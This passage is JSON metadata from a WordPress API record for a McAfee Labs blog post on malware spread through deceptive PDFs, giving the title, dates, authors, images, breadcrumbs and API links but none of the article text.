Deceptive PDF: The Gateway to Malicious Payloads | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png","datePublished":"2024-03-01T17:40:48+00:00","dateModified":"2024-03-07T07:23:24+00:00","description":"Authored by Yashvi Shah and Preksha Saxena McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2024\/03\/300x200_Blog_050823-1.png","width":300,"height":200},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/rise-in-deceptive-pdf-the-gateway-to-malicious-payloads\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Rise in Deceptive PDF: The Gateway to Malicious Payloads"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/184587","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=184587"}],"version-history":[{"count":27,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/184587\/revisions"}],"predecessor-version":[{"id":185663,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/184587\/revisions\/185663"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/185176"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=184587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=184587"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=184587"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=184587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}